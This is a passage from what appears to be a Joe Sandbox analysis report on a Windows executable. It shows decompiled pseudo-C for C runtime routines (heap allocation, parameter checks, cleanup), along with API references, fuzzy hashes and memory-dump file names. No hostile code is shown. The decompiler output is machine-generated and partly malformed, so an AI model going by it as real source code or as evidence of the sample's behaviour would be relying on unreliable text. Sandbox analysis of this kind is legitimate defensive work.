                                                                                                                                                                                                                              0x7ff735c54c9d
                                                                                                                                                                                                                              0x7ff735c54ca2
                                                                                                                                                                                                                              0x7ff735c54ca7
                                                                                                                                                                                                                              0x7ff735c54cab
                                                                                                                                                                                                                              0x7ff735c54cb4
                                                                                                                                                                                                                              0x7ff735c54cbd
                                                                                                                                                                                                                              0x7ff735c54cc7
                                                                                                                                                                                                                              0x7ff735c54cd6
                                                                                                                                                                                                                              0x7ff735c54cd8
                                                                                                                                                                                                                              0x7ff735c54cdc
                                                                                                                                                                                                                              0x7ff735c54ce3
                                                                                                                                                                                                                              0x7ff735c54ce7
                                                                                                                                                                                                                              0x7ff735c54ce9
                                                                                                                                                                                                                              0x7ff735c54cf1
                                                                                                                                                                                                                              0x7ff735c54cf6
                                                                                                                                                                                                                              0x7ff735c54cf8
                                                                                                                                                                                                                              0x7ff735c54cfe
                                                                                                                                                                                                                              0x7ff735c54d10
                                                                                                                                                                                                                              0x7ff735c54d18
                                                                                                                                                                                                                              0x7ff735c54d20
                                                                                                                                                                                                                              0x7ff735c54d22
                                                                                                                                                                                                                              0x7ff735c54d25
                                                                                                                                                                                                                              0x7ff735c54d29
                                                                                                                                                                                                                              0x7ff735c54d2d
                                                                                                                                                                                                                              0x7ff735c54d32
                                                                                                                                                                                                                              0x7ff735c54d40
                                                                                                                                                                                                                              0x7ff735c54d4a
                                                                                                                                                                                                                              0x7ff735c54d4c
                                                                                                                                                                                                                              0x7ff735c54d59
                                                                                                                                                                                                                              0x7ff735c54d62
                                                                                                                                                                                                                              0x7ff735c54d64
                                                                                                                                                                                                                              0x7ff735c54d69
                                                                                                                                                                                                                              0x7ff735c54d6e
                                                                                                                                                                                                                              0x7ff735c54d73
                                                                                                                                                                                                                              0x7ff735c54d7e
                                                                                                                                                                                                                              0x7ff735c54d88
                                                                                                                                                                                                                              0x7ff735c54d8a
                                                                                                                                                                                                                              0x7ff735c54d8e
                                                                                                                                                                                                                              0x7ff735c54d95
                                                                                                                                                                                                                              0x7ff735c54daf

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: 56afbc7605f2bd66ea76d4893cd8c064c4ee10b2a3e4945c02ddfa7a61fae1cf
                                                                                                                                                                                                                              • Instruction ID: 962235be7be77e268b97e1bb725756c0c30ac1d4cbb142dc2bf4bd3301cd249b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 56afbc7605f2bd66ea76d4893cd8c064c4ee10b2a3e4945c02ddfa7a61fae1cf
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F0116FB3A0CA4391EA65BF9394412B9E360BF85F88FC44831EA4C57686DFBDD400A760
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C64918 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                              			E00007FF77FF735C64918(intOrPtr* __rax, long long __rbx, long long _a8, intOrPtr _a40) {

				_a8 = __rbx;
				if (_a40 != 0) goto 0x35c6494d;
				E00007FF77FF735C53B18(__rax);
				 *__rax = 0x16;
				E00007FF77FF735C59400();
				return 0x16;
			}



                                                                                                                                                                                                                              0x7ff735c64918
                                                                                                                                                                                                                              0x7ff735c6492d
                                                                                                                                                                                                                              0x7ff735c6492f
                                                                                                                                                                                                                              0x7ff735c64939
                                                                                                                                                                                                                              0x7ff735c6493b
                                                                                                                                                                                                                              0x7ff735c6494c

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: 2e1a17227a7209659debcad954579089b40b10309e00a366117d544b12fb448f
                                                                                                                                                                                                                              • Instruction ID: 8ed3f4658e9de4a3ed6b32dd467d9cbb19f05c999f74122d461db97b0238fd5c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2e1a17227a7209659debcad954579089b40b10309e00a366117d544b12fb448f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F021C57360864396D761AF18D4C03B9B2A0EB84F58F980334EA5D476D9DF3CD500DB50
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C4E8D8 Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                              			E00007FF77FF735C4E8D8(long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __r8, void* __r9, long long __r14, void* _a8, void* _a16, void* _a24, void* _a32, intOrPtr _a40) {
				void* _t10;
				intOrPtr* _t21;
				intOrPtr* _t33;

				_t21 = _t33;
				 *((long long*)(_t21 + 8)) = __rbx;
				 *((long long*)(_t21 + 0x10)) = __rsi;
				 *((long long*)(_t21 + 0x18)) = __rdi;
				 *((long long*)(_t21 + 0x20)) = __r14;
				if (__r8 == 0) goto 0x35c4e931;
				if (__r9 == 0) goto 0x35c4e931;
				if (_a40 != 0) goto 0x35c4e94e;
				if (__rdx == 0xffffffff) goto 0x35c4e921;
				E00007FF77FF735C4B800(_t10, 0, __rcx, __rdx, __rdx);
				E00007FF77FF735C53B18(_t21);
				 *_t21 = 0x16;
				E00007FF77FF735C59400();
				return 0;
			}






                                                                                                                                                                                                                              0x7ff735c4e8d8
                                                                                                                                                                                                                              0x7ff735c4e8db
                                                                                                                                                                                                                              0x7ff735c4e8df
                                                                                                                                                                                                                              0x7ff735c4e8e3
                                                                                                                                                                                                                              0x7ff735c4e8e7
                                                                                                                                                                                                                              0x7ff735c4e900
                                                                                                                                                                                                                              0x7ff735c4e905
                                                                                                                                                                                                                              0x7ff735c4e90f
                                                                                                                                                                                                                              0x7ff735c4e915
                                                                                                                                                                                                                              0x7ff735c4e91c
                                                                                                                                                                                                                              0x7ff735c4e921
                                                                                                                                                                                                                              0x7ff735c4e926
                                                                                                                                                                                                                              0x7ff735c4e92c
                                                                                                                                                                                                                              0x7ff735c4e94d

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: a0cf689cca5d8c49fff13344b46025db440a5885c706eefa94002d1bcb125f44
                                                                                                                                                                                                                              • Instruction ID: 723a9035804e244e76388c3aa51df9fd811c05a5acf2127a4efc9e7d9ced428e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a0cf689cca5d8c49fff13344b46025db440a5885c706eefa94002d1bcb125f44
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0301E5A2A0875751EA41AB5359004BDE792BF95FE8F894A30DE6C17BD6CE3CD0019350
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C56180 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                              			E00007FF77FF735C56180(void* __ecx, intOrPtr* __rax, long long __rbx, long long __rdi, long long __rsi, long long _a8, long long _a16, long long _a24) {

				_a8 = __rbx;
				_a16 = __rsi;
				_a24 = __rdi;
				if (__ecx - 0x2000 < 0) goto 0x35c561c8;
				E00007FF77FF735C53B18(__rax);
				 *__rax = 9;
				E00007FF77FF735C59400();
				return 9;
			}



                                                                                                                                                                                                                              0x7ff735c56180
                                                                                                                                                                                                                              0x7ff735c56185
                                                                                                                                                                                                                              0x7ff735c5618a
                                                                                                                                                                                                                              0x7ff735c5619d
                                                                                                                                                                                                                              0x7ff735c5619f
                                                                                                                                                                                                                              0x7ff735c561a9
                                                                                                                                                                                                                              0x7ff735c561ab
                                                                                                                                                                                                                              0x7ff735c561c7

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: ab174d0a250235cabc556efa30436c54f1fc2aec82ba88ddbcfca7c3a1dc8294
                                                                                                                                                                                                                              • Instruction ID: d32b7f8018c207d7cdc6efd17514fc97ce2c55ffd11f7c0aabe1c1c422eae86b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ab174d0a250235cabc556efa30436c54f1fc2aec82ba88ddbcfca7c3a1dc8294
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B31190B390D643A6F710AB56E84003AE365FB40F48FC50834DA5D47792CF3CE890A7A0
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C5D3D0 Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 37%
                                                                                                                                                                                                                              			E00007FF77FF735C5D3D0(void* __eax, signed int __rcx, signed int __rdx) {
				intOrPtr* _t22;
				signed int _t29;

				_t29 = __rdx;
				if (__rcx == 0) goto 0x35c5d3ef;
				_t1 = _t29 - 0x20; // -32
				_t22 = _t1;
				if (_t22 - __rdx < 0) goto 0x35c5d432;
				_t25 =  ==  ? _t22 : __rcx * __rdx;
				goto 0x35c5d416;
				if (E00007FF77FF735C580F4() == 0) goto 0x35c5d432;
				if (E00007FF77FF735C61BF8(_t22,  ==  ? _t22 : __rcx * __rdx) == 0) goto 0x35c5d432;
				RtlAllocateHeap(??, ??, ??); // executed
				if (_t22 == 0) goto 0x35c5d401;
				goto 0x35c5d43f;
				E00007FF77FF735C53B18(_t22);
				 *_t22 = 0xc;
				return 0;
			}





                                                                                                                                                                                                                              0x7ff735c5d3d0
                                                                                                                                                                                                                              0x7ff735c5d3df
                                                                                                                                                                                                                              0x7ff735c5d3e3
                                                                                                                                                                                                                              0x7ff735c5d3e3
                                                                                                                                                                                                                              0x7ff735c5d3ed
                                                                                                                                                                                                                              0x7ff735c5d3fb
                                                                                                                                                                                                                              0x7ff735c5d3ff
                                                                                                                                                                                                                              0x7ff735c5d408
                                                                                                                                                                                                                              0x7ff735c5d414
                                                                                                                                                                                                                              0x7ff735c5d425
                                                                                                                                                                                                                              0x7ff735c5d42e
                                                                                                                                                                                                                              0x7ff735c5d430
                                                                                                                                                                                                                              0x7ff735c5d432
                                                                                                                                                                                                                              0x7ff735c5d437
                                                                                                                                                                                                                              0x7ff735c5d444

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF735C59EF6,?,?,?,00007FF735C590BF,?,?,00000000,00007FF735C5935A), ref: 00007FF735C5D425
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                                              • Opcode ID: f492c9cdccdd830eeaca8e4f0dbd5526f0a186d7fdadbe6c128a2481cba670af
                                                                                                                                                                                                                              • Instruction ID: db4d7b13785bcbe563008d86a8f0b447099aee6bf7849f0435b7905e01984f17
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f492c9cdccdd830eeaca8e4f0dbd5526f0a186d7fdadbe6c128a2481cba670af
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C3F04F82B0970761FE5676E795602B5D2909F88F48FCD5C30C90D8A2C1DE1CF681A230
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C5C140 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 37%
                                                                                                                                                                                                                              			E00007FF77FF735C5C140(intOrPtr* __rax, void* __rcx) {

				if (__rcx - 0xffffffe0 > 0) goto 0x35c5c18b;
				_t16 =  ==  ? __rax : __rcx;
				goto 0x35c5c172;
				if (E00007FF77FF735C580F4() == 0) goto 0x35c5c18b;
				if (E00007FF77FF735C61BF8(__rax,  ==  ? __rax : __rcx) == 0) goto 0x35c5c18b;
				RtlAllocateHeap(??, ??, ??); // executed
				if (__rax == 0) goto 0x35c5c15d;
				goto 0x35c5c198;
				E00007FF77FF735C53B18(__rax);
				 *__rax = 0xc;
				return 0;
			}



                                                                                                                                                                                                                              0x7ff735c5c14d
                                                                                                                                                                                                                              0x7ff735c5c157
                                                                                                                                                                                                                              0x7ff735c5c15b
                                                                                                                                                                                                                              0x7ff735c5c164
                                                                                                                                                                                                                              0x7ff735c5c170
                                                                                                                                                                                                                              0x7ff735c5c17e
                                                                                                                                                                                                                              0x7ff735c5c187
                                                                                                                                                                                                                              0x7ff735c5c189
                                                                                                                                                                                                                              0x7ff735c5c18b
                                                                                                                                                                                                                              0x7ff735c5c190
                                                                                                                                                                                                                              0x7ff735c5c19d

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF735C56ACC,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF735C5C17E
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                                              • Opcode ID: 16779201d370c5ea1232217f8674af7f93873ac376057f35452ccfd076e4e63a
                                                                                                                                                                                                                              • Instruction ID: 1f81f2cfbe038005cf263660bfb0cb574a6a8d20d8ce8000ad8f5d8395afeccb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 16779201d370c5ea1232217f8674af7f93873ac376057f35452ccfd076e4e63a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C4F05E82F0C607A5FA5436F359802BAD1805F89FA8F884A30DC2E862C1DD5CA8466230
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C53964 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 55%
                                                                                                                                                                                                                              			E00007FF77FF735C53964() {
				void* __rbx;
				void* _t6;
				void* _t10;
				intOrPtr* _t11;
				long long _t12;
				void* _t14;
				signed long long _t15;
				signed long long _t19;
				void* _t20;
				void* _t21;
				void* _t22;

				E00007FF77FF735C5541C(_t12, _t14, _t20, _t21, _t22);
				E00007FF77FF735C5D9D4(_t12, _t20);
				_t15 =  *0x35c8a768; // 0x0
				E00007FF77FF735C598A8(_t10,  *((intOrPtr*)(_t12 + _t15)));
				_t11 =  *0x35c8a768; // 0x0
				DeleteCriticalSection(??);
				if (_t12 + 8 != 0x18) goto 0x35c53976;
				_t19 =  *0x35c8a768; // 0x0, executed
				_t6 = E00007FF77FF735C59468(_t11, _t19); // executed
				 *0x35c8a768 =  *0x35c8a768 & 0x00000000;
				return _t6;
			}














                                                                                                                                                                                                                              0x7ff735c5396a
                                                                                                                                                                                                                              0x7ff735c5396f
                                                                                                                                                                                                                              0x7ff735c53976
                                                                                                                                                                                                                              0x7ff735c53981
                                                                                                                                                                                                                              0x7ff735c53986
                                                                                                                                                                                                                              0x7ff735c53995
                                                                                                                                                                                                                              0x7ff735c539a3
                                                                                                                                                                                                                              0x7ff735c539a5
                                                                                                                                                                                                                              0x7ff735c539ac
                                                                                                                                                                                                                              0x7ff735c539b1
                                                                                                                                                                                                                              0x7ff735c539be

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CriticalDeleteSection
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 166494926-0
                                                                                                                                                                                                                              • Opcode ID: 52ff0e39d2f9330f577126aef10b24c451d85cd18bcfee70e9e08e272bde41dc
                                                                                                                                                                                                                              • Instruction ID: 4738bdaeed99d0c593c0687d557b1da6d78ef00553a12d6ce7ccb59c1fad01fe
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 52ff0e39d2f9330f577126aef10b24c451d85cd18bcfee70e9e08e272bde41dc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3DF0AC97E18A0361FB00BBA6E991378D3B1DF99F6DF841531D90E46262DE1CA894F231
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C46C50 Relevance: 1.3, APIs: 1, Instructions: 88sleepCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00007FF735C56B78: DeleteFileW.KERNELBASE ref: 00007FF735C56B7C
                                                                                                                                                                                                                                • Part of subcall function 00007FF735C56B78: GetLastError.KERNEL32 ref: 00007FF735C56B86
                                                                                                                                                                                                                              • Sleep.KERNEL32(0000000100000000,00007FF735C4686E,00000000,00007FF735C438A7), ref: 00007FF735C46D9A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: DeleteErrorFileLastSleep
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3792865491-0
                                                                                                                                                                                                                              • Opcode ID: 99192d1fb05bb11f709d8c1f77080da0c6524ef29acd8fac08262f2a3218f964
                                                                                                                                                                                                                              • Instruction ID: 9daa3b393e8390470def40bbaf77804bf23e5149569b9553c348e44c7d544a37
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 99192d1fb05bb11f709d8c1f77080da0c6524ef29acd8fac08262f2a3218f964
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D2418153D1879792E751AB24D5052FCA361FBA9B48F85A332DF8C12257EF2CA2C8D350
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                                              Function 00007FF735C45180 Relevance: 166.5, APIs: 31, Strings: 64, Instructions: 287libraryloaderCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 40%
                                                                                                                                                                                                                              			E00007FF77FF735C45180(long long __rax, void* __rcx) {
				void* __rbx;
				long long _t11;
				void* _t12;
				void* _t22;
				void* _t23;

				_t11 = __rax;
				_t12 = __rcx;
				E00007FF77FF735C46C00(__rax, __rcx, __rcx + 0x10);
				 *((long long*)(_t12 + 0x4048)) = _t11;
				E00007FF77FF735C46C00(_t11, _t12, _t12 + 0x1010);
				 *((long long*)(_t12 + 0x4050)) = _t11;
				if ( *((intOrPtr*)(_t12 + 0x4048)) == 0) goto 0x35c451ca;
				if (_t11 == 0) goto 0x35c451ca;
				goto 0x35c45a50;
				E00007FF77FF735C42820(_t11, "LOADER: Failed to load tcl/tk libraries\n", _t11, _t22, _t23);
				return 0xffffffff;
			}








                                                                                                                                                                                                                              0x7ff735c45180
                                                                                                                                                                                                                              0x7ff735c45186
                                                                                                                                                                                                                              0x7ff735c4518d
                                                                                                                                                                                                                              0x7ff735c45199
                                                                                                                                                                                                                              0x7ff735c451a0
                                                                                                                                                                                                                              0x7ff735c451ac
                                                                                                                                                                                                                              0x7ff735c451b6
                                                                                                                                                                                                                              0x7ff735c451bb
                                                                                                                                                                                                                              0x7ff735c451c5
                                                                                                                                                                                                                              0x7ff735c451d1
                                                                                                                                                                                                                              0x7ff735c451e0

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
